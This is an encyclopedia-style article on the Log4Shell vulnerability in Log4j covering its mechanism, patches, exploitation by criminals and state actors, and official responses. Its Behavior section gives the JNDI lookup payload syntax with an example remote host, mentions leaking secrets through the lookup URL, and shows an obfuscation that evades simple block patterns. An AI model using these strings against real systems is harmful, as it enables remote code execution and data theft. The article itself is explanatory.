= Log4Shell =

2021 software security vulnerability

CVE-2021-44228
- CVSS 3.x score: 10
- CVSS 3.x vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- Date discovered: 24 November 2021; 4 years ago
- Date patched: 9 December 2021; 4 years ago
- Discoverer: Chen Zhaojun of the Alibaba Cloud Security Team
- Affected software: Applications logging user input using Log4j 2

Log4Shell (CVE-2021-44228) is a vulnerability reported in November 2021 in Log4j, a popular Java logging framework, involving arbitrary code execution and exploited as a zero-day vulnerability. The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021.

Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices.

The vulnerability takes advantage of Log4j allowing requests to arbitrary LDAP and JNDI servers, allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. A list of affected software projects has been published by the Apache Security Team. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ and many others. According to Wiz and EY, the vulnerability affected 93% of enterprise cloud environments.

The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," Ars Technica called it "arguably the most severe vulnerability ever" and The Washington Post said that descriptions by security professionals "border on the apocalyptic."

== Background ==
Log4j is an open-source logging framework that allows software developers to log data within their applications, and can include user input. It is used ubiquitously in Java applications, especially enterprise software. Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation. Tom Kellermann, a member of President Obama's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments".

== Behavior ==
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.

In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which case they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).

Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header, such as User-Agent. Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi. Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j. Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed.

== Mitigation ==
Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. Two more vulnerabilities in the library were found: a denial-of-service attack, tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true, but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases.

Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages.

Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. The approach is recommended by NCC Group and the National Cyber Security Centre (United Kingdom), and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE.

== Usage ==
The exploit allows hackers to gain control of vulnerable devices using Java. Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining, creating botnets, sending spam, establishing backdoors and other illegal activities such as ransomware attacks. In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally.

According to Cloudflare CEO Matthew Prince, evidence of exploitation or of scanning for the exploit goes back as early as 1 December 2021, nine days before it was publicly disclosed. According to cybersecurity firm GreyNoise, several IP addresses were scraping websites to check for servers that had the vulnerability. Several botnets began scanning for the vulnerability, including the Muhstik botnet by 10 December, as well as Mirai and Tsunami. Ransomware group Conti was observed using the vulnerability on 17 December.

Some state-sponsored groups in China and Iran also utilized the exploit according to Check Point, but it is not known if the exploit was used by Israel, Russia or the United States prior to the disclosure of the vulnerability. Check Point said that on 15 December 2021, Iran-backed hackers attempted to infiltrate the networks of Israeli businesses and government institutions. In November 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) reported that actors they assessed to be sponsored by the Iranian government had exploited Log4Shell in February 2022 to gain initial access to an unpatched VMware Horizon server at a federal civilian executive branch organisation. The attackers then installed XMRig cryptocurrency-mining software, compromised credentials and set up Ngrok reverse proxies on several hosts.

== Response and impact ==
=== Governmental ===
In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, described the exploit as "one of the most serious I've seen in my entire career, if not the most serious", explaining that hundreds of millions of devices were affected and advising vendors to prioritize software updates. Civilian agencies contracted by the United States government had until 24 December 2021 to patch vulnerabilities. On 4 January, the Federal Trade Commission (FTC) stated its intent to pursue companies that fail to take reasonable steps to update used Log4j software. In a White House meeting, the importance of security maintenance of open-source software – often also carried out largely by few volunteers – to national security was clarified. While some open-source projects have many eyes on them, others do not have many or any people ensuring their security.

Germany's Bundesamt für Sicherheit in der Informationstechnik (BSI) designated the exploit as being at the agency's highest threat level, calling it an "extremely critical threat situation". It also reported that several attacks were already successful and that the extent of the exploit remained hard to assess. The Netherlands's National Cyber Security Centre (NCSC) began an ongoing list of vulnerable applications.

The Canadian Centre for Cyber Security (CCCS) called on organizations to take immediate action. The Canada Revenue Agency temporarily shut down its online services after learning of the exploit, while the Government of Quebec closed almost 4,000 of its websites as a "preventative measure." The Belgian Ministry of Defence experienced a breach attempt and was forced to shut down part of its network.

The Chinese Ministry of Industry and Information Technology suspended Alibaba Cloud as a cybersecurity threat intelligence partner for six months for failing to report the vulnerability to the government in a timely manner.

=== Businesses ===
Research conducted by Wiz and EY showed that 93% of the cloud enterprise environment were vulnerable to Log4Shell. 7% of vulnerable workloads are exposed to the Internet and prone to wide exploitation attempts. According to the research, ten days after vulnerability disclosure (20 December 2021) only 45% of vulnerable workloads were patched on average in cloud environments. Amazon, Google and Microsoft cloud data was affected by Log4Shell. Microsoft asked Windows and Azure customers to remain vigilant after observing state-sponsored and cyber-criminal attackers probing systems for the Log4j 'Log4Shell' flaw through December 2021.

The human resource management and workforce management company UKG, one of the largest businesses in the industry, was targeted by a ransomware attack that affected large businesses. UKG said it did not have evidence of Log4Shell being exploited in the incident, though analyst Allan Liska from cybersecurity company Recorded Future said there was possibly a connection.

As larger companies began to release patches for the exploit, the risk for small businesses increased as hackers focused on more vulnerable targets.

=== Privacy ===
Some personal devices connected to the Internet, such as smart TVs and security cameras, were vulnerable to the exploit. Some software may never get a patch due to discontinued manufacturer support.

== Analysis ==
As of 14 December 2021, almost half of all corporate networks globally had been actively probed, with over 60 variants of the exploit having been produced within 24 hours. Check Point Software Technologies described the situation as being "a true cyber-pandemic" and characterized the potential for damage as "incalculable". In August 2023, a joint advisory by CISA and partner cybersecurity agencies listed Log4Shell among the top 12 vulnerabilities that malicious cyber actors routinely exploited in 2022. It said that exploitation had begun after the flaw was publicly disclosed in December 2021 and that interest in it remained high through the first half of 2022. Several initial advisories exaggerated the amount of packages that were vulnerable, leading to false positives. Most notably, the "log4j-api" package was marked as vulnerable, while in reality further research showed that only the main "log4j-core" package was vulnerable. This was confirmed both in the original issue thread and by external security researchers.

Technology magazine Wired wrote that despite the previous "hype" surrounding multiple vulnerabilities, "the Log4j vulnerability ... lives up to the hype for a host of reasons". The magazine explains that the pervasiveness of Log4j, the vulnerability being difficult to detect by potential targets and the ease of transmitting code to victims created a "combination of severity, simplicity, and pervasiveness that has the security community rattled". Wired also outlined stages of hackers using Log4Shell; cryptomining groups first using the vulnerability, data brokers then selling a "foothold" to cybercriminals, who finally go on to engage in ransomware attacks, espionage and destroying data.

Amit Yoran, CEO of Tenable and the founding director of the United States Computer Emergency Readiness Team, stated "[Log4Shell] is by far the single biggest, most critical vulnerability ever", noting that sophisticated attacks were beginning shortly after the bug, saying "We're also already seeing it leveraged for ransomware attacks, which, again, should be a major alarm bell ... We've also seen reports of attackers using Log4Shell to destroy systems without even looking to collect ransom, a fairly unusual behavior". Sophos's senior threat researcher Sean Gallagher said, "Honestly, the biggest threat here is that people have already gotten access and are just sitting on it, and even if you remediate the problem somebody's already in the network ... It's going to be around as long as the Internet."

According to a Bloomberg News report, some anger was directed at Apache's developers at their failure to fix the vulnerability after warnings about exploits of broad classes of software, including Log4j, were made at a 2016 cybersecurity conference.

== See also ==
- PHP2Shell, a similarly named vulnerability
